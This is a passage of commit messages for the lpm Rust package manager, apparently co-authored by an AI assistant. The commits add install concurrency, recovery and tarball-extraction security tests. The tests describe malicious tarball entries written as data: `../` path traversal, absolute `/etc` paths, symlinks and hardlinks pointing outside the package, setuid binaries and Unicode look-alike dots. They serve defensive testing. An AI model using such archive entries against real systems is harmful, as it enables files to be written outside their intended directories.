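A target such as `.lpm/<seg>/node_modules/<pkg>` is flagged, while `../.lpm/wrappers/<seg>/...`, a bare `..` self-reference, and a workspace path with no `.lpm` segment are left alone.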

5 new tests:
- `cleanup_stale_entries_removes_legacy_shape_root_symlink`
- `cleanup_stale_entries_preserves_new_shape_root_symlink`
- `cleanup_stale_entries_preserves_workspace_member_symlink`
- `cleanup_stale_entries_preserves_self_reference_symlink`
- `link_finalize_retargets_legacy_root_symlink_after_migration`
  (end-to-end: post-migration install produces a working symlink
  resolving to a real `package.json`)

MEDIUM — `.version` schema-tag must not mask migration. The 61.1
`.version` write at the wrapper root happens BEFORE any wrapper is
materialized; pre-fix, `dir_is_nonempty` counted `.version` as
evidence of a populated layout, so a half-completed install (or any
state where the new root has only `.version`) would silently mask a
needed migration AND make `lpm doctor` report a healthy isolated
install when no wrappers actually existed. Both
`needs_layout_migration` and `install_appears_healthy` consume the
helper.

Fix: `dir_is_nonempty` now skips entries whose name starts with `.`.
Wrapper segments from `LayoutPaths::wrapper_segment` cannot produce
a leading-dot name (path-separator sanitizer is `replace('/', '+')`,
never `.`), so the dotfile filter cannot miss a real wrapper.
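
A sketch of the dotfile-aware check, assuming the helper takes a directory path and returns an `io::Result<bool>`. The real signature and error handling of `dir_is_nonempty` are not shown in this commit, so treat both as assumptions.

```rust
use std::fs;
use std::io;
use std::path::Path;

/// A directory counts as populated only if it holds at least one entry whose
/// name does not start with `.`, so a root containing just `.version` is
/// treated as empty. Signature is assumed for illustration.
fn dir_is_nonempty(dir: &Path) -> io::Result<bool> {
    for entry in fs::read_dir(dir)? {
        let name = entry?.file_name();
        if !name.to_string_lossy().starts_with('.') {
            return Ok(true);
        }
    }
    Ok(false)
}
```

With this shape, a metadata-only wrapper root reports `false`, which is the condition both `needs_layout_migration` and `install_appears_healthy` need to see.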

2 new tests:
- `needs_layout_migration_true_when_new_root_has_only_version_file`
- `install_appears_healthy_metadata_only_root_is_not_isolated`

4966 workspace tests pass; clippy --workspace -D warnings clean;
cargo fmt clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* test(lpm-linker): scoped legacy-symlink retarget belt-and-braces

Audit follow-up: the scoped-name branch (`@scope/pkg`) of
`cleanup_stale_entries`'s root-symlink sweep traverses a separate
code path from the unscoped branch. The retarget fix in the prior
commit applies to both, but the existing test only exercised the
unscoped case. This test adds the scoped equivalent so a future
refactor that drops the legacy-shape predicate from the scoped
branch fails loud.

Setup: a `node_modules/@types/node` symlink whose target is the
pre-Phase-61.1 scoped shape (`../.lpm/<seg>/node_modules/@types/node`,
no `wrappers/` segment). After cleanup the legacy symlink must be
removed so Phase 3 recreates it pointing at the new
`../../.lpm/wrappers/<seg>/...` two-level shape.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request May 14, 2026
…low gate

Ships the 10 cross-command flow tests enumerated in the v2 baseline
and flips EXPECT_FULL_V2_FLOWS_BACKFILL to true so future flow drops
hard-fail the audit.

Each flow exercises a real-user multi-command sequence and asserts
the state-transfer claim that ties the commands together — what
command A leaves on disk / in the keychain / in the lockfile is the
input command B reads. Single-command tests assert each step in
isolation; flow tests catch state-shape mismatches between steps.

Flows shipped:
- install → patch → patch-commit → install (patch persistence)
- migrate → install → audit (lockfile round-trips)
- install → rebuild → approve-scripts → rebuild (approval lifecycle)
- doctor --fix → install (fix survives install)
- add → install → graph (added dep visible)
- install → upgrade --major → audit (envelope shape)
- token-rotate → publish --dry-run --check (token hand-off)
- publish --dry-run --check → publish (target agreement)
- install -g → run shimmed binary → uninstall -g (shim lifecycle)
- env push → env pull cross-machine (round-trip — scoped to local
  smoke until a cross-machine harness lands)

Several flows had their assertions scoped narrower than the original
"catches" claim:
- Flow #6 (rebuild lifecycle): rebuild --policy=deny ignores the
  v2 object form of trustedDependencies that approve-scripts writes
  — a real contract gap, filed as private finding #75. The flow
  asserts the manifest mutation; rebuild #2 only checks envelope
  health.
- Flow #4 (upgrade major audit): the workflow tier's MockRegistry
  helpers don't mount GET /api/registry/{name} per-package (only
  the batch endpoint), so upgrade's candidate selection finds no
  candidates. Flow asserts envelope shape; tighten when the mock
  grows the per-package GET.
- Flow #7 (env push/pull cross-machine): proper round-trip needs a
  shared-vault-state test harness that doesn't exist yet. Flow
  smokes per-machine env state isolation; promote when the harness
  lands.
- Flow #8 (install -g): gracefully degrades when `install -g` doesn't
  emit a shim on the test runner (cli-binary tier owns the strict
  contract).

Run results: 10/10 flow tests pass, all 10 v2 audit tests pass,
full lpm-workflows suite green (623/623), clippy clean, fmt clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request May 14, 2026
…htening, cross-machine vault harness

Six focused follow-ups against the v2 coverage matrix.

JSON contract depth promotions (SemanticAsserts → InstaSnapshot):

- id 4  lpm whoami       — insta snapshot added to
  `whoami_recovers_session_from_refresh_token_only` in
  `auth_lifecycle.rs`. Pins the envelope shape under a refresh-only
  session recovery.
- id 97 lpm env ls/list  — insta snapshot added to
  `env_list_json_envelope_carries_keys` in `env_local.rs`. The
  envelope is a flat key→masked-value map; locked with `sort_maps`
  for stable ordering across `preserve_order`-enabled serde_json.
- id 101 lpm env push/pull — insta snapshot added to the GitLab
  OIDC pull --json test in `env_vault.rs`. Pins the {env, count,
  vars} shape after the LPM_OIDC_TOKEN canonical-input contract.

JSON contract depth promotions (None → SemanticAsserts):

- id 74 lpm approve-scripts `<pkg>` — verified the named `<pkg>`
  form test reads `parsed["dry_run"]` and `parsed["approved_count"]`
  via `serde_json::from_str`. Audited the other 34 None rows: most
  are either commands that don't emit JSON envelopes (completions,
  dev/tunnel streams, login/logout) or rows where the named sub-form
  isn't directly covered by an envelope-reading test fn.

Cross-command flow #4 (install → upgrade --major → audit) tightened:

- Lifted the private `mount_upgrade_package` from `upgrade.rs` into
  the shared `MockRegistry::with_full_package_metadata` helper. It
  mounts the per-package GET (`/api/registry/{name}` + the
  npm-direct `/{name}` path) AND the batch-metadata POST from one
  metadata document, with optional `None` tarball-bytes for the
  fail-tarball case. `lpm upgrade`'s candidate selector reads the
  GET endpoint; the install fallback reads batch-metadata; the
  shared helper makes both observable from a single call.
- Tightened the rebuild #2 assertion in flow #4 to require that the
  upgrade --major --dry-run envelope mention both `2.0.0` and the
  scoped package name. The assertion was previously gated behind
  "shared mount missing"; that gate is now removed.

Finding #75 (rebuild --policy=deny ignores object-form
trustedDependencies) — RETRACTED:

- `TrustedDependencies` in lpm-workspace is `#[serde(untagged)]`
  over both `Vec<String>` (Legacy) and `HashMap<String, Binding>`
  (Rich). `evaluate_trust` in rebuild.rs routes through
  `matches_strict`, which prefers the concrete `name@version` key
  and falls back to the `name@*` preserve key. Object form is
  already supported.
- The empty `packages[]` flow #6 originally observed was
  `TrustMatch::BindingDrift`: the fixture's synthetic
  `"sha256-flow-script-hash"` did not match the real
  `compute_script_hash(store_dir)` value rebuild computes on disk.
  Synthetic vs. recomputed hash divergence, not a missing reader.
- Fixed in flow #6 by computing the real script_hash via
  `lpm_security::script_hash::compute_script_hash` and propagating
  it through `.lpm/build-state.json` → approve-scripts → manifest.
  Rebuild #2 now asserts `packages[]` contains `scripted-pkg@1.0.0`
  with `trusted: true`.
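
A rough sketch of the lookup order described above, assuming the rich form is a plain map keyed by `name@version` or `name@*`. Only `BindingDrift` is named in this commit; the other variant names, the `script_hash` field, and the hash comparison on the fallback key are assumptions made for illustration.

```rust
use std::collections::HashMap;

#[derive(Debug, PartialEq)]
enum TrustMatch {
    Strict,       // assumed variant name
    BindingDrift, // named in the commit message
    NotTrusted,   // assumed variant name
}

struct Binding {
    script_hash: String, // assumed field
}

/// Prefers the concrete `name@version` key, then falls back to `name@*`.
/// A binding whose recorded hash differs from the on-disk hash is drift.
fn matches_strict(
    rich: &HashMap<String, Binding>,
    name: &str,
    version: &str,
    script_hash_on_disk: &str,
) -> TrustMatch {
    let concrete = format!("{name}@{version}");
    let preserve = format!("{name}@*");
    let binding = rich.get(&concrete).or_else(|| rich.get(&preserve));
    match binding {
        None => TrustMatch::NotTrusted,
        Some(b) if b.script_hash == script_hash_on_disk => TrustMatch::Strict,
        Some(_) => TrustMatch::BindingDrift,
    }
}
```

Under these assumptions, a fixture that records a synthetic hash finds its key but still fails the comparison against the recomputed hash, which matches the retraction's "divergence, not a missing reader" diagnosis.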

Cross-command flow #7 (env push → env pull cross-machine) — full
byte-equality round-trip now lands:

- Added `MockRegistry::with_stateful_personal_sync(vault_id,
  bearer)` to share `Arc<Mutex<Option<StoredSyncBlob>>>` between
  POST and GET handlers on `/api/vaults/{vault_id}/sync`. POST
  captures encryptedBlob + wrappedKey + bumps the version; GET
  returns the stored payload signed with the bearer's HMAC. A
  fresh GET before any POST returns 404 — the natural "machine B
  pulls before machine A pushed" shape.
- Flow #7 now drives two TempProjects sharing this mock. Both
  HOMEs are seeded with the same `<HOME>/.lpm/.vault-key` (32-byte
  hex, the cryptographic outcome that real pairing produces) +
  the same paired session bearer. Machine A: `env set` → `env push`.
  Machine B: `env pull` → `env get --reveal`. The revealed
  plaintext must byte-equal the value machine A pushed.
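
The shared-state idea behind the stateful mock can be sketched without any HTTP layer. The struct fields, handler names, and the "first version is 1" rule below are assumptions for illustration; HMAC signing and bearer checks are deliberately left out.

```rust
use std::sync::{Arc, Mutex};

#[derive(Clone, Debug, PartialEq)]
struct StoredSyncBlob {
    encrypted_blob: Vec<u8>,
    wrapped_key: Vec<u8>,
    version: u64,
}

/// One slot shared by the POST and GET handlers of the mock.
type SharedVault = Arc<Mutex<Option<StoredSyncBlob>>>;

/// POST side: store the payload and bump the version (assumed to start at 1).
fn handle_post(state: &SharedVault, encrypted_blob: Vec<u8>, wrapped_key: Vec<u8>) -> u64 {
    let mut slot = state.lock().unwrap();
    let version = slot.as_ref().map_or(1, |blob| blob.version + 1);
    *slot = Some(StoredSyncBlob { encrypted_blob, wrapped_key, version });
    version
}

/// GET side: return the stored payload, or a 404 status if nothing was pushed.
fn handle_get(state: &SharedVault) -> Result<StoredSyncBlob, u16> {
    let slot = state.lock().unwrap();
    slot.clone().ok_or(404)
}
```

Cloning the `Arc` into both handlers is what lets "machine B" observe exactly the bytes "machine A" pushed, which is the property the byte-equality assertion relies on.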

scenarios_by_file partitions populated for shared test files:

- id 83 lpm run `<script>`            — run.rs: 14
- id 84 lpm run --filter / --all / --affected — run.rs: 7
- id 87 lpm lint                      — tools.rs: 5
- id 88 lpm fmt (write)               — tools.rs: 3
- id 89 lpm fmt --check               — tools.rs: 1
- id 91 lpm test                      — tools.rs: 7
- id 96 lpm env init                  — env_local.rs: 1
- id 98 lpm env set/get/delete        — env_local.rs: 6
- id 99 lpm env import/export/print/copy — env_local.rs: 4
- id 100 lpm env diff/validate/check  — env_local.rs: 4

Full CI gate green (workspace target, separate CARGO_TARGET_DIR):

- cargo clippy --workspace --all-targets -- -D warnings  clean
- cargo fmt --check                                       clean
- grep -r 'fancy-regex' crates/*/Cargo.toml              (none)
- cargo build --workspace                                 clean
- cargo nextest run --workspace --exclude lpm-integration-tests
                                                          6397/6397 pass

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
tolgaergin added a commit that referenced this pull request May 14, 2026
…ix (#58)

* test(workflows): pin concurrency + recovery contracts for lpm install

Adds tests/workflows/tests/install_concurrency.rs with 13 falsifiable
tests covering production failure modes that had zero coverage:

Category A — process racing:
  * two concurrent installs on same project (pins finding-#77 floor)
  * install + concurrent store-clean serialize via shared/exclusive
    store_lock (probed via try_with_exclusive_lock on the actual
    lock file, not a directory-existence proxy)
  * two concurrent `lpm install -g` via global_tx_lock — proves
    final manifest + WAL coherence under serialized commits

Category B — interruption recovery:
  * kill mid-tarball-fetch leaves no .lpm/install-hash
  * next `lpm install` converges to a coherent end state

Category C — network faults:
  * tarball 503 → 200 succeeds after retry (counting Respond impl)
  * metadata 404 fails immediately without retry (<2s wall-clock)

Category D — filesystem faults:
  * readonly project dir fails with actionable error (no panic);
    POSIX-only via #[cfg(unix)], RAII guard restores permissions
  * `<project>/.lpm` planted as a regular file fails clearly

Category E — partial state recovery:
  * stale install-hash triggers re-resolve + refetch
  * partial node_modules re-links to full state
  * truncated lpm.lockb either recovers or fails cleanly (no panic)

Category F — WAL recovery hook:
  * torn WAL tail (3 garbage bytes) gets truncated by the dispatcher's
    recovery hook before the command runs; idempotent on re-invocation

Support helper refactor (same commit so the new helper has callers):
  * extracts env-isolation set into `LpmEnvSink` trait +
    `apply_lpm_env(cmd, project)` shared by `lpm()` (assert_cmd) and
    the new `lpm_spawnable()` / `lpm_spawnable_with_registry()`
    (std::process::Command, supports Child::kill())
  * trait impl on both Command variants ensures the two helpers
    cannot drift on the ~30 env knobs that gate test isolation

Surfaced findings during this work:
  * #77 — no project-level install lock: concurrent installs silently
    drop one side's work AND/OR fail with atomic-rename races (3
    observed failure modes documented in findings.md). Fix shape:
    LpmRoot::project_install_lock + with_exclusive_lock_async wrap.
  * #78 — retry-backoff has no test-friendly knob; retry-exhaustion
    tests take 15s+. Fix shape: LPM_RETRY_BACKOFF_MS_OVERRIDE env in
    debug builds.

CI gate locally green:
  clippy --workspace --all-targets -- -D warnings: clean
  cargo fmt --check: clean
  fancy-regex ban: empty
  cargo build --workspace: clean
  cargo nextest run --workspace --exclude lpm-integration-tests:
      6439 passed, 7 skipped, 1 leaky (pre-existing)

Deferred (filed under "next session" in the followup plan):
  B.3 (kill doesn't tear lockfile) — subsumed by B.1/B.2
  B.4 (panic injection) — needs LPM_TEST_PANIC_AT env hook
  C.2 (retry exhaustion) — blocked by finding #78
  C.3 (truncated body) — needs custom Respond with Content-Length mismatch
  D.3 (disk-full simulation) — no portable mechanism
  F.2, F.3 (orphan WAL, torn WAL with real records) — needs
    framed-WAL construction helpers

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* test(workflows): pin lpm.lock well-formedness + recovery skip-on-contention

Closes B.3 and F.2 of the concurrency tranche — 13 → 15 tests, meeting
the "≥15 of 21" acceptance criterion for Item 2.

B.3 — `install_killed_mid_pipeline_leaves_well_formed_or_absent_lockfile`:
Exercises two SIGKILL windows on the install pipeline — fresh project
and project with a committed lpm.lock from a prior install. After each
kill, asserts the on-disk lpm.lock is either absent OR parses as TOML.
Never half-written. Adds `toml = { workspace = true }` as a workflow-
tests dev-dep for the parse assertion. Helper
`assert_lockfile_well_formed_or_absent` shared between both windows.

F.2 — `lpm_command_skips_recovery_when_another_lpm_holds_global_tx_lock`:
Validates the dispatcher's `try_with_exclusive_lock` idempotent-skip
path at `main.rs:2531`. A background thread acquires `global_tx_lock`
via `lpm_common::with_exclusive_lock` and blocks on a channel. With
the lock held, runs `lpm global list` against a project with a torn-
WAL prefix — asserts the WAL bytes are UNCHANGED (skip arm fired,
recovery did not run). Then releases the lock and re-runs; asserts
the WAL is now truncated (recovery defers correctly to the next
lock-free invocation). Exercises both the Ok(None) and Ok(Some)
arms of `try_with_exclusive_lock`.

CI gate locally green:
  cargo clippy --workspace --all-targets -- -D warnings: clean
  cargo fmt --check: clean
  cargo nextest run --workspace --exclude lpm-integration-tests:
      6441/6441 passed, 7 skipped
  5x parallel re-run of install_concurrency: 15/15 stable each run

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* test(workflows): pin truncated-tarball + orphan-WAL recovery contracts

Two new tests in tests/workflows/tests/install_concurrency.rs:

- C.3 tarball_connection_dropped_mid_body_fails_or_retries: a custom
  wiremock Respond impl serves half a tarball with a Content-Length
  header naming the full length. Pins the install pipeline's
  retry-then-fail behavior on transport-class failures (~14s wall-clock
  for the full 4-attempt retry schedule). Hyper 1.9 server-side panics
  on the Content-Length lie, dropping the connection — a valid surrogate
  for a broken upstream / CDN dropping mid-body. Surfaced 8 tarball GETs
  per install (deterministic, 3-of-3 reproducer), explained by two
  distinct download_tarball_* call sites in install.rs each running the
  4-attempt retry budget.

- F.3 lpm_command_with_orphan_pending_tx_emits_recovery_banner: plants
  both halves of an orphan transaction (WAL Intent record without
  matching Commit/Abort + matching [pending.<pkg>] row in manifest.toml
  pointing at a non-existent install root) and asserts the dispatcher's
  recovery hook fires the RolledBack banner from main.rs:2543. Sets
  RUST_LOG=lpm=info to lift the default lpm=warn filter so the
  tracing::info! line surfaces. Adds lpm-global as a workflow dev-dep
  for WalWriter / IntentPayload / write_for. Pins post-state: orphan
  pending row gone, no spurious active row.

Together these close the C.3 and F.3 gaps in Item 2 of the test
coverage follow-up plan: 17/21 scenarios pinned (was 15/21). The four
remaining items all need source-side hooks (LPM_TEST_PANIC_AT,
LPM_RETRY_BACKOFF_MS_OVERRIDE, container infra) and are out of scope
for this tranche.

Full CI gate green: clippy clean, fmt clean, fancy-regex empty,
6443/6443 nextest pass (was 6441 pre-tranche).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* test(workflows): pin tarball-extraction security contracts at install tier

New file tests/workflows/tests/tarball_security.rs ships phase 1 of
Item 3 (tarball-extraction security): 5 of 10 planned tests covering
the most distinct security contracts at the install-pipeline tier.
Each test constructs its malicious tarball in-line via tar::Builder
(no checked-in fixtures), serves it through MockRegistry, and runs
lpm install end-to-end so any pipeline-level regression that bypasses
the extractor's hardening is caught.

Tests landed:

- #1 tarball_with_dot_dot_path_entry_is_rejected_by_install — pokes
  package/../escape.txt into the raw tar header bytes; install fails
  with "path traversal detected"; outside sentinel never created.
- #3 tarball_with_absolute_path_entry_is_normalized_to_relative_under_package_dir
  — renamed from "rejected" to reflect actual contract. The extractor's
  strip_first_component consumes the RootDir; an entry like
  /etc/lpm-pwned.txt extracts as node_modules/<pkg>/etc/lpm-pwned.txt.
  Install SUCCEEDS; literal /etc/lpm-pwned.txt is never written.
  Defensible: malformed-but-safe input normalized rather than refused.
- #2 tarball_with_symlink_to_outside_path_is_silently_skipped —
  renamed. The is_file() gate at lib.rs:398 silently drops symlinks;
  install succeeds with byte-identical outside sentinel.
- #5 tarball_with_hard_link_to_outside_file_is_silently_skipped —
  renamed. Same is_file() gate; hardlinks silently skipped; outside
  victim file unmodified.
- #8 tarball_with_setuid_executable_extracts_with_setuid_bit_stripped
  (POSIX-only) — tarball entry mode 0o4755 extracts as 0o755. SUID,
  SGID, and sticky bits all cleared via set_preserve_permissions(false)
  + the explicit `0o644 | exec_bits` mode set after write. Exec bits
  preserved.
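
Two of the contracts above reduce to small pure functions. This is a sketch under the assumption that `strip_first_component` simply drops the leading path component and that the mode is rebuilt as `0o644 | exec_bits`; `sanitized_mode` is a hypothetical name, and the real extractor code is not shown in this commit.

```rust
use std::path::{Path, PathBuf};

/// Drops the leading component of a tar entry path (normally `package/`).
/// For an absolute entry the leading component is the root itself, so the
/// remainder is relative and lands under the package directory.
fn strip_first_component(entry: &Path) -> PathBuf {
    entry.components().skip(1).collect()
}

/// Rebuilds the on-disk mode from a fixed 0o644 base plus the entry's exec
/// bits. SUID (0o4000), SGID (0o2000) and sticky (0o1000) never survive.
/// Hypothetical helper name.
fn sanitized_mode(tar_mode: u32) -> u32 {
    let exec_bits = tar_mode & 0o111;
    0o644 | exec_bits
}
```

Note that because the base is a constant, a restrictive input such as `0o600` would come out as `0o644` in this sketch; only the exec bits are carried over from the tarball.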

Three tests carry a "plan-vs-actual" docstring section explaining why
the rename is defensible — the actual extractor contract differs from
the plan's prescribed phrasing in safe ways, not in regression-grade
ways. No findings filed.

Phase 2 (5 remaining tests: Unicode normalization, device file, FIFO,
zero-byte sanity, OS-max path) is deferred to a follow-up tranche
with rationale + lift estimate documented in the plan. None blocks
phase 1 acceptance.

Pre-merge gate green: clippy clean, fmt clean, fancy-regex empty,
6448/6448 nextest pass (was 6443; +5 for the new tests). 0.18s wall-
clock for the full file.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(install): per-project lock prevents concurrent-install data loss

Closes finding #77. Two `lpm install <pkg>` invocations on the same
project no longer race on the manifest snapshot+commit window.

Pre-fix, both processes acquired only a SHARED store_lock and proceeded
in parallel. Each opened its own per-process ManifestTransaction
snapshot of the pre-edit package.json, staged its own dep on top, and
ran the install pipeline. Whoever wrote package.json + lpm.lock last
won; the other process's edits — including its node_modules link —
silently vanished. Both processes still exited 0 with success-path
output. CI scripts that ran two installs in parallel saw no signal of
the data loss.

The fix introduces:

- crates/lpm-common/src/paths.rs::project_install_lock(project_dir):
  free helper returning <project_dir>/.lpm/.install.lock. Re-exported
  from crates/lpm-common/src/lib.rs.

- run_add_packages and run_install_filtered_add in
  crates/lpm-cli/src/commands/install.rs now wrap the snapshot →
  stage → install → finalize → commit window in
  with_exclusive_lock_async against the project lock. The lock is
  per-project (no cross-project contention) and held across all
  ?-early-exits via the async block's return.

For the workspace path, the lock sits at the discovered workspace root
(not per-member) so two concurrent `lpm install --filter <member>`
invocations on the same workspace serialize without per-member
deadlock-ordering complexity.

run_with_options (the inner install pipeline) does NOT acquire this
lock: it is called both from inside the run_add_packages wrap and
from many other commands, and double-acquiring the same fd-lock would
deadlock in-process.

Deferred (phase 2, not exercised by A.1): lpm add (add.rs:723-904)
has a similar 180-line transaction with recursive Swift handling.
Wrapping it is invasive and the race surface is theoretical (users
don't typically run `lpm add` and `lpm install` concurrently). Defer
to a separate tranche if a concurrent `lpm add` × `lpm install` race
is ever observed.

Test contract tightening (bug-first per CLAUDE.md):
two_concurrent_installs_on_same_project_leave_well_formed_manifest in
tests/workflows/tests/install_concurrency.rs went from "at-least-one
survives + manifest is well-formed JSON" (the floor) to "BOTH installs
succeed, BOTH packages present in package.json deps, BOTH packages
linked in node_modules/" (the contract). Pre-fix: 1/1 fail (pkg-b
silently dropped). Post-fix: 5/5 pass with no flakes (~1.2s wall-clock
each — install B observes pkg-a's commit and reports "Resolved 2
packages").

Pre-merge gate green: clippy --workspace --all-targets clean, fmt
clean, fancy-regex empty, 6448/6448 nextest pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(registry): test-only retry-backoff override env knob

Closes finding #78 + lands C.2 (`tarball_503_exhausts_retries_fails_with_http_status`).

Pre-fix, retry-exhaustion tests were blocked: the registry client's
backoff schedule (1+2+4+8s, capped at 10s) made every retry-exhaustion
test take ~15s per fetch site (~28s with the install pipeline's 2
distinct download_tarball_* call sites). MAX_RETRIES, RETRY_BASE_DELAY,
and RETRY_MAX_DELAY are private const with no env override. C.2
therefore had to be #[ignore]-gated behind LPM_RUN_SLOW_TESTS=1, and
the retry-exhaustion contract went unproven on `cargo nextest run`.

The fix introduces:

- crates/lpm-registry/src/client.rs::backoff_override(): reads
  LPM_RETRY_BACKOFF_MS_OVERRIDE (a u64 ms value) gated by
  cfg!(debug_assertions) || LPM_TEST_MODE=1. Returns Some(Duration)
  when both conditions hold; None otherwise. Production retry policy
  is immune — release builds without LPM_TEST_MODE=1 silently ignore
  the env.

- backoff_delay(attempt) consults the override before computing the
  exponential schedule.

- The two 429 Retry-After sleep sites also consult the override so a
  future 429-flood retry-exhaustion test wouldn't hang on the
  server-supplied header.
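
A sketch of the override gate and the exponential schedule, written as pure functions so it can be exercised without touching the process environment. The constant values follow the "1+2+4+8s, capped at 10s" description; the extra parameters (`raw`, `test_mode`, `override_delay`) and the zero-based `attempt` are assumptions, since the real `backoff_override()` and `backoff_delay(attempt)` read the environment themselves.

```rust
use std::time::Duration;

const RETRY_BASE_DELAY: Duration = Duration::from_secs(1);
const RETRY_MAX_DELAY: Duration = Duration::from_secs(10);

/// `raw` stands in for the value of LPM_RETRY_BACKOFF_MS_OVERRIDE and
/// `test_mode` for LPM_TEST_MODE=1. Outside debug builds and test mode the
/// override is ignored.
fn backoff_override(raw: Option<&str>, test_mode: bool) -> Option<Duration> {
    if !(cfg!(debug_assertions) || test_mode) {
        return None;
    }
    raw?.trim().parse::<u64>().ok().map(Duration::from_millis)
}

/// Consults the override first, then falls back to base * 2^attempt, capped.
fn backoff_delay(attempt: u32, override_delay: Option<Duration>) -> Duration {
    if let Some(delay) = override_delay {
        return delay;
    }
    let factor = 2u32.saturating_pow(attempt);
    RETRY_BASE_DELAY.saturating_mul(factor).min(RETRY_MAX_DELAY)
}
```

Summing the un-overridden delays for attempts 0 through 3 gives 1 + 2 + 4 + 8 = 15 seconds, which is why a 10 ms override is what makes an `elapsed < 2s` assertion feasible.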

C.2 test landed alongside (bug-first per CLAUDE.md):

- Mock returns 503 on every tarball request — no recovery path.
- Test sets LPM_RETRY_BACKOFF_MS_OVERRIDE=10 on the lpm subprocess.
- Asserts: install fails non-zero, no panic, ≥4 attempts (proves the
  retry loop fired), elapsed < 2s (load-bearing — without the knob
  this fails at ~14s), stderr contains an actionable HTTP-class
  noun (503 / status / http / network / etc).
- Surfaces 8 tarball GETs per install (4 attempts × 2 distinct
  download_tarball_* call sites — matches C.3's observation).

Pre-fix verification: same C.2 against the unfixed client.rs failed
on the elapsed assertion at 14.04s (knob ignored). Post-fix: passes
in 1.6s cold / 0.1s warm. 5/5 passes with no flakes.

Pre-merge gate green: clippy --workspace --all-targets clean, fmt
clean, fancy-regex empty, 6449/6449 nextest pass (was 6448 pre-fix;
+1 for C.2).

Item 2 of the test-coverage-followup-plan now at 18/21 (was 17/21).
Both findings #77 and #78 fixed in production.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* test(workflows): tarball-security phase 2 — Unicode, device, FIFO, zero-byte, long-path

Adds 5 more tests to tarball_security.rs, completing Item 3 of the
test-coverage follow-up plan. Each test pins the actual extractor
contract under malicious-or-edge-case tarball shapes that reach the
install pipeline through MockRegistry.

Tests landed:

- #4 tarball_with_unicode_lookalike_parent_dir_extracts_safely_as_literal_bytes
  — renamed from "_normalization_traversal_rejected" to reflect the
  actual contract. Tarball entry path uses full-width dots U+FF0E `．．`
  (bytewise NOT ASCII `..`). Component::ParentDir is byte-exact, so
  `．．` becomes Component::Normal. Install SUCCEEDS; `．．` materializes
  as a literal directory under node_modules/<pkg>/; outside sentinel
  byte-identical. Defensible because Path::components() doesn't
  NFKC-normalize on POSIX.

- #6 tarball_with_character_device_entry_is_silently_skipped
  (POSIX-only). EntryType::Char with /dev/null-shaped major/minor.
  Same is_file() gate as symlinks/hardlinks — silently skipped.
  Install SUCCEEDS; no device file at the expected path.

- #7 tarball_with_fifo_entry_is_silently_skipped (POSIX-only).
  EntryType::Fifo. Same posture as #6.

- #9 tarball_with_zero_byte_regular_file_extracts_as_empty_file.
  Sanity check that empty files still extract correctly (legitimate
  npm shape: .gitkeep, license placeholders).

- #10 tarball_with_single_path_component_exceeding_name_max_fails_cleanly.
  300-byte single-component name, well over POSIX NAME_MAX=255. Tar
  wire format succeeds via GNU long-name extension; the FILESYSTEM
  rejects on extraction (ENAMETOOLONG). Extractor wraps as
  LpmError::Io → install fails non-zero with the OS error visible
  and an actionable noun in stderr.
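
The byte-exact behavior behind test #4 can be checked directly against `std::path`. The helper name `has_parent_dir` is hypothetical; the sketch only illustrates how `Path::components()` classifies ASCII `..` versus the full-width look-alike.

```rust
use std::path::{Component, Path};

/// True if any component of the entry path is a real parent-dir reference.
/// Only the two-byte ASCII sequence `..` produces `Component::ParentDir`.
fn has_parent_dir(entry: &Path) -> bool {
    entry.components().any(|c| matches!(c, Component::ParentDir))
}

/// Builds an entry path whose middle segment is two U+FF0E characters.
fn fullwidth_lookalike_entry() -> String {
    format!("package/{dots}/escape.txt", dots = "\u{FF0E}\u{FF0E}")
}
```

The look-alike segment is six bytes of UTF-8 rather than two ASCII dots, so it is classified as an ordinary name and extraction stays inside the package directory.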

Three of the five tests are renamed to reflect actual extractor
contract vs the plan's prescribed phrasing — same "plan-vs-actual"
docstring pattern as phase 1. No findings filed; all 10 contracts
across phase 1 + 2 are defensible-as-implemented.

Pre-merge gate green: clippy --workspace --all-targets clean, fmt
clean, fancy-regex empty, 6454/6454 nextest pass (was 6449 pre-tranche;
+5 for the new tests). Full file 0.2s wall-clock for all 10 tests.

Item 3 now COMPLETE (10/10).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* test(workflows): cross-command flows Item 4 — migrate→rebuild + workspace filter isolation

Closes Item 4 of the test-coverage-followup-plan at 6/6 (target was
≥5). Two additions to tests/workflows/tests/cross_command_flows.rs:

- Plan #1 — extended flow_migrate_install_audit_lockfile_round_trips
  with a `lpm rebuild --dry-run --policy=deny` step. Pins the full
  migrate → install → audit → rebuild lifecycle. Asserts the rebuild
  step exits 0 + does not mutate the post-audit state (lpm.lock +
  lpm.lockb still present). Catches regressions where rebuild's
  lockfile or build-state parser breaks against a freshly-migrated
  manifest.

- Plan #5 — added flow_workspace_install_filter_member_a_does_not_mutate_member_b
  (new test, 159 LOC). Pins the workspace-member isolation contract
  using the workspace-monorepo fixture (3 members: app, core,
  utils):
    1. Initial filtered install on @test/core (re-pinning its
       existing semver dep) populates core's per-member quadruple:
       lpm.lock=319 B, lockb=230 B, install_hash=118 B.
    2. Snapshot core's full quadruple.
    3. Run `lpm install chalk@5.3.0 --filter @test/app` to add a
       new dep to app ONLY.
    4. Assert app's package.json gained chalk; core's quadruple
       (package.json + lpm.lock + lpm.lockb + install-hash) is
       BYTE-IDENTICAL post-install; chalk does NOT appear in
       core's node_modules/.

  Catches a regression where a per-member filtered install
  accidentally also mutates a sibling member's package.json /
  lockfile / install-hash — a real bug class because run_install_filtered_add
  shares the workspace-root project lock (added in #77 fix) and
  could over-snapshot if the target-set computation drifts.

  Helper `mount_pkg_full(mock, name, version)` factors out the
  three-step metadata + batch-metadata + tarball mount so the
  test body stays readable.

Other 4 plan flows already covered pre-tranche:
- Plan #2: flow_add_install_graph_added_dep_visible
